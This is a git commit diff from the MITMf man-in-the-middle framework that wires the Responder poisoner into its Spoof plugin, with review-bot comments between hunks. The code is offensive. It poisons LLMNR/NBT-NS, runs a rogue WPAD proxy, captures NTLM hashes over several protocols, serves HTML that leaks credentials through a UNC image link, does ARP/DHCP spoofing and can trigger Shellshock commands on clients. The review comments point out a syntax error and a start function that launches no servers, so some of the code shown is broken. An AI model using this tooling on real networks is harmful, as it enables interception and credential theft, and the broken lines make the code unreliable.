almost done! lots of changes

This commit is contained in:
byt3bl33d3r 2014-12-05 08:21:35 +01:00
parent e8c36dbc89
commit 787f96d665
12 changed files with 202 additions and 201 deletions


@ -55,8 +55,8 @@ HTMLToServe = <html><head></head><body><img src='file:\\\\\RespProxySrv\ssed\sey
[HTTPS Server]
;
;Change to use your certs
cert = Certs/responder.crt
key = Certs/responder.key
cert = config/certs/responder.crt
key = config/certs/responder.key
;


@ -1,6 +1,6 @@
import logging, re, os.path, time
from datetime import date
from sslstrip.DummyResponseTamperer import DummyResponseTamperer
from libs.sslstrip.DummyResponseTamperer import DummyResponseTamperer
class AppCachePoisonClass(DummyResponseTamperer):


@ -16,106 +16,38 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys,struct,SocketServer,re,optparse,socket,thread,Fingerprint,random,os,ConfigParser,BaseHTTPServer, select,urlparse,zlib, string, time
import sys
import struct
import SocketServer
import re
import socket
import thread
import libs.responder.Fingerprint
import random
import os
import ConfigParser
import BaseHTTPServer
import select
import urlparse
import zlib
import string
import logging
import time
from OpenSSL import SSL
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, StreamRequestHandler, BaseRequestHandler,BaseServer
from Fingerprint import RunSmbFinger,OsNameClientVersion
from odict import OrderedDict
from libs.responder.Fingerprint import RunSmbFinger, OsNameClientVersion
from libs.responder.odict import OrderedDict
from libs.responder.RAPLANMANPackets import *
from libs.responder.SMBPackets import *
from libs.responder.SQLPackets import *
from libs.responder.HTTPPackets import *
from libs.responder.HTTPProxy import *
from libs.responder.LDAPPackets import *
from libs.responder.SMTPPackets import *
from libs.responder.IMAPPackets import *
from socket import inet_aton
from random import randrange
VERSION = 'Responder 2.1.2'
parser = optparse.OptionParser(usage='python %prog -i 10.20.30.40 -w -r -f\nor:\npython %prog -i 10.20.30.40 -wrf', version = VERSION,
prog=sys.argv[0],
)
parser.add_option('-A','--analyze', action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning anything.", dest="Analyse")
parser.add_option('-i','--ip', action="store", help="The ip address to redirect the traffic to. (usually yours)", metavar="10.20.30.40",dest="OURIP")
parser.add_option('-I','--interface', action="store", help="Network interface to use", metavar="eth0", dest="INTERFACE", default="Not set")
parser.add_option('-b', '--basic',action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned.", dest="Basic", default=False)
parser.add_option('-r', '--wredir',action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False", dest="Wredirect", default=False)
parser.add_option('-d', '--NBTNSdomain',action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False",dest="NBTNSDomain", default=False)
parser.add_option('-f','--fingerprint', action="store_true", dest="Finger", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.", default=False)
parser.add_option('-w','--wpad', action="store_true", dest="WPAD_On_Off", help = "Set this to start the WPAD rogue proxy server. Default value is False", default=False)
parser.add_option('-F','--ForceWpadAuth', action="store_true", dest="Force_WPAD_Auth", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False",default=False)
parser.add_option('--lm',action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False", dest="LM_On_Off", default=False)
parser.add_option('-v',action="store_true", help="More verbose",dest="Verbose")
options, args = parser.parse_args()
if options.OURIP is None:
print "\n\033[1m\033[31m-i mandatory option is missing\033[0m\n"
parser.print_help()
exit(-1)
ResponderPATH = os.path.dirname(__file__)
#Config parsing
config = ConfigParser.ConfigParser()
config.read(os.path.join(ResponderPATH,'Responder.conf'))
# Set some vars.
On_Off = config.get('Responder Core', 'HTTP').upper()
SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
SMB_On_Off = config.get('Responder Core', 'SMB').upper()
SQL_On_Off = config.get('Responder Core', 'SQL').upper()
FTP_On_Off = config.get('Responder Core', 'FTP').upper()
POP_On_Off = config.get('Responder Core', 'POP').upper()
IMAP_On_Off = config.get('Responder Core', 'IMAP').upper()
SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
DNS_On_Off = config.get('Responder Core', 'DNS').upper()
Krb_On_Off = config.get('Responder Core', 'Kerberos').upper()
NumChal = config.get('Responder Core', 'Challenge')
SessionLog = config.get('Responder Core', 'SessionLog')
Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
FILENAME = config.get('HTTP Server', 'Filename')
WPAD_Script = config.get('HTTP Server', 'WPADScript')
HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
RespondTo = config.get('Responder Core', 'RespondTo').strip()
RespondTo.split(",")
RespondToName = config.get('Responder Core', 'RespondToName').strip()
RespondToName.split(",")
DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
DontRespondTo.split(",")
DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
DontRespondToName.split(",")
#Cli options.
OURIP = options.OURIP
LM_On_Off = options.LM_On_Off
WPAD_On_Off = options.WPAD_On_Off
Wredirect = options.Wredirect
NBTNSDomain = options.NBTNSDomain
Basic = options.Basic
Finger_On_Off = options.Finger
INTERFACE = options.INTERFACE
Verbose = options.Verbose
Force_WPAD_Auth = options.Force_WPAD_Auth
AnalyzeMode = options.Analyse
if HTMLToServe == None:
HTMLToServe = ''
if INTERFACE != "Not set":
BIND_TO_Interface = INTERFACE
if INTERFACE == "Not set":
BIND_TO_Interface = "ALL"
if len(NumChal) is not 16:
print "The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n"
parser.print_help()
exit(-1)
def IsOsX():
Os_version = sys.platform
if Os_version == "darwin":
@ -138,26 +70,6 @@ def Analyze(AnalyzeMode):
else:
return False
#Logger
CommandLine = str(sys.argv)
import logging
logging.basicConfig(filename=str(os.path.join(ResponderPATH,SessionLog)),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
StartMessage = 'Responder Started\nCommand line args:%s' %(CommandLine)
logging.warning(StartMessage)
Log2Filename = str(os.path.join(ResponderPATH,"LLMNR-NBT-NS.log"))
logger2 = logging.getLogger('LLMNR/NBT-NS')
logger2.addHandler(logging.FileHandler(Log2Filename,'w'))
AnalyzeFilename = str(os.path.join(ResponderPATH,"Analyze-LLMNR-NBT-NS.log"))
logger3 = logging.getLogger('Analyze LLMNR/NBT-NS')
logger3.addHandler(logging.FileHandler(AnalyzeFilename,'a'))
def Show_Help(ExtraHelpData):
help = "NBT Name Service/LLMNR Responder 2.0.\nPlease send bugs/comments to: lgaffie@trustwave.com\nTo kill this script hit CRTL-C\n\n"
help+= ExtraHelpData
print help
#Function used to write captured hashs to a file.
def WriteData(outfile,data, user):
if os.path.isfile(outfile) == False:
@ -208,17 +120,6 @@ def PrintLLMNRNBTNS(outfile,Message):
else:
return True
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
Challenge = ""
for i in range(0,len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex")
Show_Help("[+]NBT-NS, LLMNR & MDNS responder started\n[+]Loading Responder.conf File..\nGlobal Parameters set:\nResponder is bound to this interface: %s\nChallenge set: %s\nWPAD Proxy Server: %s\nWPAD script loaded: %s\nHTTP Server: %s\nHTTPS Server: %s\nSMB Server: %s\nSMB LM support: %s\nKerberos Server: %s\nSQL Server: %s\nFTP Server: %s\nIMAP Server: %s\nPOP3 Server: %s\nSMTP Server: %s\nDNS Server: %s\nLDAP Server: %s\nFingerPrint hosts: %s\nServing Executable via HTTP&WPAD: %s\nAlways Serving a Specific File via HTTP&WPAD: %s\n\n"%(BIND_TO_Interface, NumChal,WPAD_On_Off,WPAD_Script,On_Off,SSL_On_Off,SMB_On_Off,LM_On_Off,Krb_On_Off,SQL_On_Off,FTP_On_Off,IMAP_On_Off,POP_On_Off,SMTP_On_Off,DNS_On_Off,LDAP_On_Off,Finger_On_Off,Exe_On_Off,Exec_Mode_On_Off))
if AnalyzeMode:
print '[+]Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.\n'
#Packet class handling all packet generation (see odict.py).
class Packet():
fields = OrderedDict([
@ -494,7 +395,6 @@ class NB(BaseRequestHandler):
##################################################################################
#Browser Listener and Lanman Finger
##################################################################################
from RAPLANMANPackets import *
def WorkstationFingerPrint(data):
Role = {
@ -666,8 +566,6 @@ class Browser(BaseRequestHandler):
##################################################################################
#SMB Server
##################################################################################
from SMBPackets import *
#Detect if SMB auth was Anonymous
def Is_Anonymous(data):
SecBlobLen = struct.unpack('<H',data[51:53])[0]
@ -1101,8 +999,6 @@ class KerbUDP(BaseRequestHandler):
##################################################################################
#SQL Stuff
##################################################################################
from SQLPackets import *
#This function parse SQL NTLMv1/v2 hash and dump it into a specific file.
def ParseSQLHash(data,client):
SSPIStart = data[8:]
@ -1294,8 +1190,6 @@ def AnalyzeICMPRedirect():
if Analyze(AnalyzeMode) and INTERFACE != 'Not set':
IsICMPRedirectPlausible(FindLocalIP(INTERFACE))
AnalyzeICMPRedirect()
# LLMNR Server class.
class LLMNR(BaseRequestHandler):
@ -1567,9 +1461,6 @@ class MDNS(BaseRequestHandler):
##################################################################################
#HTTP Stuff
##################################################################################
from HTTPPackets import *
from HTTPProxy import *
#Parse NTLMv1/v2 hash.
def ParseHTTPHash(data,client):
LMhashLen = struct.unpack('<H',data[12:14])[0]
@ -1994,7 +1885,6 @@ class ProxyHandler (BaseHTTPServer.BaseHTTPRequestHandler):
##################################################################################
#HTTPS Server
##################################################################################
from OpenSSL import SSL
#Parse NTLMv1/v2 hash.
def ParseHTTPSHash(data,client):
LMhashLen = struct.unpack('<H',data[12:14])[0]
@ -2082,8 +1972,8 @@ class SSlSock(ThreadingMixIn, TCPServer):
def __init__(self, server_address, RequestHandlerClass):
BaseServer.__init__(self, server_address, RequestHandlerClass)
ctx = SSL.Context(SSL.SSLv3_METHOD)
cert = os.path.join(ResponderPATH,config.get('HTTPS Server', 'cert'))
key = os.path.join(ResponderPATH,config.get('HTTPS Server', 'key'))
cert = config.get('HTTPS Server', 'cert'))
key = config.get('HTTPS Server', 'key'))
ctx.use_privatekey_file(key)
ctx.use_certificate_file(cert)
self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
@ -2160,8 +2050,6 @@ class FTP(BaseRequestHandler):
##################################################################################
#LDAP Stuff
##################################################################################
from LDAPPackets import *
def ParseSearch(data):
Search1 = re.search('(objectClass)', data)
Search2 = re.search('(?i)(objectClass0*.*supportedCapabilities)', data)
@ -2291,8 +2179,6 @@ class POP(BaseRequestHandler):
##################################################################################
#ESMTP Stuff
##################################################################################
from SMTPPackets import *
#ESMTP server class.
class ESMTP(BaseRequestHandler):
@ -2323,8 +2209,6 @@ class ESMTP(BaseRequestHandler):
##################################################################################
#IMAP4 Stuff
##################################################################################
from IMAPPackets import *
#ESMTP server class.
class IMAP(BaseRequestHandler):
@ -2374,7 +2258,7 @@ def Is_WPAD_On(on_off):
return False
#Function name self-explanatory
def Is_SMB_On(SMB_On_Off):
def Is_SMB_On(SMB_On_Off, LM_On_Off):
if SMB_On_Off == "ON":
if LM_On_Off == True:
return thread.start_new(serve_thread_tcp, ('', 445,SMB1LM)),thread.start_new(serve_thread_tcp,('', 139,SMB1LM))
@ -2540,18 +2424,125 @@ def serve_thread_SSL(host, port, handler):
else:
server = SSlSock((host, port), handler)
server.serve_forever()
except:
print "Error starting TCP server on port " + str(port) + ". Check that you have the necessary permissions (i.e. root), no other servers are running and the correct network interface is set in Responder.conf."
except Exception, e:
print "[-] Error starting TCP server on port " + str(port) + ": " + str(e)
print "Check that you have the necessary permissions (i.e. root), no other servers/services are running and the correct network interface was chosen"
def start_responder(options, ipaddr):
VERSION = '2.1.2'
global OURIP; OURIP = ipaddr
global LM_On_Off; LM_On_Off = options.LM_On_Off
global WPAD_On_Off; WPAD_On_Off = options.WPAD_On_Off
global Wredirect; Wredirect= options.Wredirect
global NBTNSDomain; NBTNSDomain = options.NBTNSDomain
global Basic; Basic = options.Basic
global Finger_On_Off; Finger_On_Off = options.Finger
global INTERFACE; INTERFACE = options.interface
global BIND_TO_Interface; BIND_TO_Interface = options.interface
global Verbose; Verbose = options.Verbose
global Force_WPAD_Auth; Force_WPAD_Auth = options.Force_WPAD_Auth
global AnalyzeMode; AnalyzeMode = options.Analyse
#Read the responder.conf file
global config; config = ConfigParser.ConfigParser()
config.read('./config/responder.conf')
On_Off = config.get('Responder Core', 'HTTP').upper()
SSL_On_Off = config.get('Responder Core', 'HTTPS').upper()
SMB_On_Off = config.get('Responder Core', 'SMB').upper()
SQL_On_Off = config.get('Responder Core', 'SQL').upper()
FTP_On_Off = config.get('Responder Core', 'FTP').upper()
POP_On_Off = config.get('Responder Core', 'POP').upper()
IMAP_On_Off = config.get('Responder Core', 'IMAP').upper()
SMTP_On_Off = config.get('Responder Core', 'SMTP').upper()
LDAP_On_Off = config.get('Responder Core', 'LDAP').upper()
DNS_On_Off = config.get('Responder Core', 'DNS').upper()
Krb_On_Off = config.get('Responder Core', 'Kerberos').upper()
NumChal = config.get('Responder Core', 'Challenge')
if len(NumChal) is not 16:
sys.exit("[-] The challenge must be exactly 16 chars long.\nExample: -c 1122334455667788\n")
# Break out challenge for the hexidecimally challenged. Also, avoid 2 different challenges by accident.
Challenge = ""
for i in range(0,len(NumChal),2):
Challenge += NumChal[i:i+2].decode("hex")
SessionLog = config.get('Responder Core', 'SessionLog')
Exe_On_Off = config.get('HTTP Server', 'Serve-Exe').upper()
Exec_Mode_On_Off = config.get('HTTP Server', 'Serve-Always').upper()
FILENAME = config.get('HTTP Server', 'Filename')
WPAD_Script = config.get('HTTP Server', 'WPADScript')
HTMLToServe = config.get('HTTP Server', 'HTMLToServe')
if HTMLToServe == None:
HTMLToServe = ''
RespondTo = config.get('Responder Core', 'RespondTo').strip()
RespondTo.split(",")
RespondToName = config.get('Responder Core', 'RespondToName').strip()
RespondToName.split(",")
DontRespondTo = config.get('Responder Core', 'DontRespondTo').strip()
DontRespondTo.split(",")
DontRespondToName = config.get('Responder Core', 'DontRespondToName').strip()
DontRespondToName.split(",")
#Logger
#CommandLine = str(sys.argv)
#logging.basicConfig(filename=str(os.path.join(ResponderPATH,SessionLog)),level=logging.INFO,format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
#StartMessage = 'Responder Started\nCommand line args:%s' %(CommandLine)
#logging.warning(StartMessage)
#Log2Filename = str("./logs/LLMNR-NBT-NS.log"))
#logger2 = logging.getLogger('LLMNR/NBT-NS')
#logger2.addHandler(logging.FileHandler(Log2Filename,'w'))
#AnalyzeFilename = str("./logs/Analyze-LLMNR-NBT-NS.log"))
#logger3 = logging.getLogger('Analyze LLMNR/NBT-NS')
#logger3.addHandler(logging.FileHandler(AnalyzeFilename,'a'))
AnalyzeICMPRedirect()
def main():
try:
banner = "[*] NBT-NS, LLMNR & MDNS Responder v%s by Laurent Gaffie online\n" % VERSION
start_message = "Global Parameters set:\n"
start_message += "Responder is bound to interface: %s\n" % INTERFACE
start_message += "Challenge set: %s\n" % NumChal
start_message += "WPAD Proxy Server: %s\n" % WPAD_On_Off
start_message += "WPAD script loaded: %s\n" % WPAD_Script
start_message += "HTTP Server: %s\n" % On_Off
start_message += "HTTPS Server: %s\n" % SSL_On_Off
start_message += "SMB Server: %s\n" % SMB_On_Off
start_message += "SMB LM support: %s\n" % LM_On_Off
start_message += "Kerberos Server: %s\n" % Krb_On_Off
start_message += "SQL Server: %s\n" % SQL_On_Off
start_message += "FTP Server: %s\n" % FTP_On_Off
start_message += "IMAP Server: %s\n" % IMAP_On_Off
start_message += "POP3 Server: %s\n" % POP_On_Off
start_message += "SMTP Server: %s\n" % SMTP_On_Off
start_message += "DNS Server: %s\n" % DNS_On_Off
start_message += "LDAP Server: %s\n" % LDAP_On_Off
start_message += "FingerPrint hosts: %s\n" % Finger_On_Off
start_message += "Serving Executable via HTTP&WPAD: %s\n" % Exe_On_Off
start_message += "Always Serving a Specific File via HTTP&WPAD: %s\n" % Exec_Mode_On_Off
print banner
#print start_message
if AnalyzeMode:
print '[*] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned'
num_thrd = 1
Is_FTP_On(FTP_On_Off)
Is_HTTP_On(On_Off)
Is_HTTPS_On(SSL_On_Off)
Is_WPAD_On(WPAD_On_Off)
Is_Kerberos_On(Krb_On_Off)
Is_SMB_On(SMB_On_Off)
Is_SMB_On(SMB_On_Off, LM_On_Off)
Is_SQL_On(SQL_On_Off)
Is_LDAP_On(LDAP_On_Off)
Is_DNS_On(DNS_On_Off)
@ -2569,9 +2560,3 @@ def main():
time.sleep(1)
except KeyboardInterrupt:
exit()
if __name__ == '__main__':
try:
main()
except:
raise
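Review bot: The two new lines in the `SSlSock.__init__` hunk each end with one closing parenthesis too many — `cert = config.get('HTTPS Server', 'cert'))` and `key = config.get('HTTPS Server', 'key'))` — which is a SyntaxError that prevents the whole module (and therefore `from libs.responder.Responder import *` in the Spoof plugin) from importing; they should read `cert = config.get('HTTPS Server', 'cert')` and `key = config.get('HTTPS Server', 'key')`. With the `os.path.join(ResponderPATH, ...)` wrapper dropped, the certificate and key paths from responder.conf are now resolved against the process working directory rather than the module location, which deserves a comment or re-anchoring on `os.path.dirname(__file__)`; `__init__` continues past the end of the hunk. In the `start_responder` hunk, `Challenge`, `NumChal`, `On_Off`, `SessionLog` and the other config values are bound as plain locals, unlike the `global` assignments above them, so `main()` and any handler that reads them at module scope would raise NameError; and as far as this hunk shows the function only loads config and calls `AnalyzeICMPRedirect()` without invoking the `Is_*_On` starters, which stay in `main()` whose `__main__` guard the last hunk deletes.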


@ -27,7 +27,7 @@ class URLMonitor:
self.strippedURLPorts = {}
self.faviconReplacement = False
hsts_config = ConfigObj("./config_files/hsts_bypass.cfg")
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v


@ -13,7 +13,7 @@ import argparse
from plugins import *
plugin_classes = plugin.Plugin.__subclasses__()
mitmf_version = "0.8"
mitmf_version = "0.9"
sslstrip_version = "0.9"
sergio_version = "0.2.1"
@ -94,7 +94,7 @@ if __name__ == "__main__":
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
print "[*] sslstrip+ by Leonardo Nve running..."
print "[*] sergio-proxy v%s online" % sergio_version
print "[*] sergio-proxy v%s online..." % sergio_version
else:
from libs.sslstrip.StrippingProxy import StrippingProxy


@ -32,7 +32,7 @@ class AirPwn(Plugin):
sys.exit("[-] AirPwn plugin requires --miface argument")
try:
self.aircfg = ConfigObj(self.aircfg)
self.aircfg = ConfigObj("./config/airpwn.cfg")
#Here we compile the regexes for faster performance when injecting packets
for rule in self.aircfg.items():
rule[1]['match'] = re.compile(r'%s' % rule[1]['match'])
@ -135,5 +135,4 @@ class AirPwn(Plugin):
def add_options(self, options):
options.add_argument('--miface', type=str, dest='mon_interface', help='Interface in monitor mode to use')
options.add_argument('--aircfg', type=file, default="./config_files/airpwn.cfg", help="Airpwn config file [default: airpwn.cfg]")
options.add_argument('--dnspwn', type=str, dest='dnspwn', help='Enables the DNSpwn attack and specifies ip')


@ -1,21 +1,18 @@
from plugins.plugin import Plugin
from sslstrip.ResponseTampererFactory import ResponseTampererFactory
from libs.sslstrip.ResponseTampererFactory import ResponseTampererFactory
#import threading
class AppCachePlugin(Plugin):
name = "App Cache Poison"
optname = "app"
optname = "appoison"
desc = "Performs App Cache Poisoning attacks"
has_opts = True
has_opts = False
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.config_file = options.tampercfg or "./config_files/app_cache_poison.cfg"
self.config_file = "./config/app_cache_poison.cfg"
print "[*] App Cache Poison plugin online"
ResponseTampererFactory.buildTamperer(self.config_file)
def add_options(self, options):
options.add_argument("--tampercfg", type=file, help="Specify a config file")


@ -38,7 +38,7 @@ class BeefAutorun(Inject, Plugin):
else:
sys.exit("[-] Error logging in to BeEF!")
userconfig = ConfigObj(self.autoruncfg)
userconfig = ConfigObj("./config/beefautorun.cfg")
self.Mode = userconfig['mode']
self.All_modules = userconfig["ALL"]
@ -117,10 +117,10 @@ class BeefAutorun(Inject, Plugin):
sleep(0.5)
def add_options(self, options):
options.add_argument('--hookip', dest='hookip', help="Hook IP")
group = options.add_mutually_exclusive_group(required=False)
group.add_argument('--hookip', dest='hookip', help="Hook IP")
group.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')
options.add_argument('--beefip', dest='beefip', default='127.0.0.1', help="IP of BeEF's server [default: localhost]")
options.add_argument('--beefport', dest='beefport', default='3000', help="Port of BeEF's server [default: 3000]")
options.add_argument('--beefuser', dest='beefuser', default='beef', help='Username for beef [default: beef]')
options.add_argument('--beefpass', dest='beefpass', default='beef', help='Password for beef [default: beef]')
options.add_argument('--autoruncfg', type=file, default="./config_files/beefautorun.cfg", help='Specify a config file [default: beefautorun.cfg]')
options.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=True, help='Disables automatically injecting the hook url')
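Review bot: The `--disable-inject` argument added to the new mutually exclusive group is declared with `action='store_true', default=True`, so `dis_inject` is True whether or not the flag is passed and the group with `--hookip` cannot exclude anything in practice. The default should be `False`: `group.add_argument('--disable-inject', dest='dis_inject', action='store_true', default=False, help='Disables automatically injecting the hook url')`. Since the group is `required=False` and `--hookip` has no default, the code that consumes `self.hookip` earlier in the file (outside this hunk) presumably needs to handle the unset case — worth confirming.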


@ -38,7 +38,7 @@ class FilePwn(Plugin):
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.filepwncfg = options.filepwncfg or "./config_files/filepwn.cfg"
self.filepwncfg = options.filepwncfg or "./config/filepwn.cfg"
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload',
'application/x-msdos-program', 'binary/octet-stream']


@ -35,7 +35,7 @@ class JavaPwn(BrowserProfiler, Plugin):
if not self.msfip:
sys.exit('[-] JavaPwn plugin requires --msfip')
self.javacfg = ConfigObj(self.javapwncfg)
self.javacfg = ConfigObj("./config/javapwn.cfg")
self.javaVersionDic = {}
for key, value in self.javacfg.iteritems():
@ -182,7 +182,6 @@ class JavaPwn(BrowserProfiler, Plugin):
options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
options.add_argument('--javapwncfg', type=file, default="./config_files/javapwn.cfg", help='Specify a config file [default: javapwn.cfg]')
def finish(self):
'''This will be called when shutting down'''


@ -13,6 +13,7 @@ import nfqueue
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
from libs.responder.Responder import *
import os
import sys
import threading
@ -39,11 +40,8 @@ class Spoof(Plugin):
self.interface = options.interface
self.arp = options.arp
self.icmp = options.icmp
self.wpad = options.wpad
self.dns = options.dns
self.dnscfg = options.dnscfg
self.dhcp = options.dhcp
self.dhcpcfg = options.dhcpcfg
self.shellshock = options.shellshock
self.cmd = options.cmd
self.gateway = options.gateway
@ -52,10 +50,11 @@ class Spoof(Plugin):
self.arpmode = options.arpmode
self.port = options.listen
self.hsts = options.hsts
self.hstscfg = "./config_files/hsts_bypass.cfg"
self.manualiptables = options.manualiptables #added by alexander.georgiev@daloo.de
self.debug = False
self.send = True
thread_target = None
thread_args = None
if os.geteuid() != 0:
sys.exit("[-] Spoof plugin requires root privileges")
@ -63,13 +62,17 @@ class Spoof(Plugin):
if not self.interface:
sys.exit('[-] Spoof plugin requires --iface argument')
try:
self.ip_address = get_if_addr(options.interface)
if self.ip_address == "0.0.0.0":
sys.exit("[-] Interface %s does not have an IP address" % self.interface)
except Exception, e:
sys.exit("[-] Error retrieving interface IP address: %s" % e)
if self.options.log_level == 'debug':
self.debug = True
print "[*] Spoof plugin online"
if not self.manualiptables:
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
try:
self.mac = get_if_hwaddr(self.interface)
except Exception, e:
@ -107,19 +110,24 @@ class Spoof(Plugin):
self.rand_number = []
self.dhcp_dic = {}
self.dhcpcfg = ConfigObj(self.dhcpcfg)
self.dhcpcfg = ConfigObj("./config/dhcp.cfg")
thread_target = self.dhcp_sniff
thread_args = ()
else:
sys.exit("[-] Spoof plugin requires --arp, --icmp or --dhcp")
elif not options.WPAD_On_Off:
sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --wpad")
print "[*] Spoof plugin online"
if not self.manualiptables:
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')
if (self.dns or self.hsts):
print "[*] DNS Tampering enabled"
if self.dns:
self.dnscfg = ConfigObj(self.dnscfg)
self.dnscfg = ConfigObj("./config/dns.cfg")
self.hstscfg = ConfigObj(self.hstscfg)
self.hstscfg = ConfigObj("./config/hsts_bypass.cfg")
if not self.manualiptables:
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
@ -133,11 +141,16 @@ class Spoof(Plugin):
print '[*] Setting up iptables'
os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % self.port)
CHarvester = CredHarvester()
t1 = threading.Thread(name='spoof_thread', target=thread_target, args=thread_args)
t2 = threading.Thread(name='cred_harvester', target=CHarvester.start, args=(self.interface))
#CHarvester = CredHarvester()
threads = []
if thread_target:
threads.append(threading.Thread(name='spoof_thread', target=thread_target, args=thread_args))
#t2 = threading.Thread(name='cred_harvester', target=CHarvester.start, args=(self.interface))
for t in [t1, t2]:
threads.append(threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address)))
if threads:
for t in threads:
t.setDaemon(True)
t.start()
@ -345,14 +358,22 @@ class Spoof(Plugin):
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
options.add_argument('--shellshock', dest='shellshock', action='store_true', default=False, help='Trigger the Shellshock vuln when spoofing DHCP')
options.add_argument('--cmd', type=str, dest='cmd', default="echo 'pwned'", help='Command to run on vulnerable clients [default: echo pwned]')
options.add_argument("--dnscfg", type=file, default="./config_files/dns.cfg", help="DNS tampering config file [default: dns.cfg]")
options.add_argument("--dhcpcfg", type=file, default="./config_files/dhcp.cfg", help="DHCP spoofing config file [default: dhcp.cfg]")
options.add_argument('--iface', dest='interface', help='Specify the interface to use')
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
#options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
options.add_argument('--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
#rgroup = options.add_argument_group("Responder", "Options for Responder")
options.add_argument('--analyze', dest="Analyse", action="store_true", help="Analyze mode. This option allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning anything")
options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")
options.add_argument('--fingerprint', dest="Finger", default=False, action="store_true", help = "This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query")
options.add_argument('--wpad', dest="WPAD_On_Off", default=False, action="store_true", help = "Set this to start the WPAD rogue proxy server. Default value is False")
options.add_argument('--forcewpadauth', dest="Force_WPAD_Auth", default=False, action="store_true", help = "Set this if you want to force NTLM/Basic authentication on wpad.dat file retrieval. This might cause a login prompt in some specific cases. Therefore, default value is False")
options.add_argument('--lm', dest="LM_On_Off", default=False, action="store_true", help="Set this if you want to force LM hashing downgrade for Windows XP/2003 and earlier. Default value is False")
options.add_argument('--verbose', dest="Verbose", action="store_true", help="More verbose")
def finish(self):
self.send = False
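Review bot: The new `threads.append(threading.Thread(name='responder', target=start_responder, args=(options, self.ip_address)))` line appears to sit outside the `if thread_target:` guard, so a Responder thread is created on every plugin start, while the `elif not options.WPAD_On_Off: sys.exit(...)` branch only rejects the no-spoofing case rather than gating Responder on `--wpad`; the indentation is lost in this rendering, so please confirm which it is. As the `start_responder` hunk of Responder.py in this same commit shows, that function only loads responder.conf and calls `AnalyzeICMPRedirect()` before returning, and the `Is_*_On` listener starters remain in Responder's `main()`, which this commit no longer calls, so the daemon thread most likely exits without starting any server; either invoke the starters from `start_responder` or point the thread at a function that does. `from libs.responder.Responder import *` also pulls every module-level name of Responder (including its `main`) into this module's namespace; `from libs.responder.Responder import start_responder` would import only what is used. The `initialize` method these hunks edit starts before the first hunk and ends after the third.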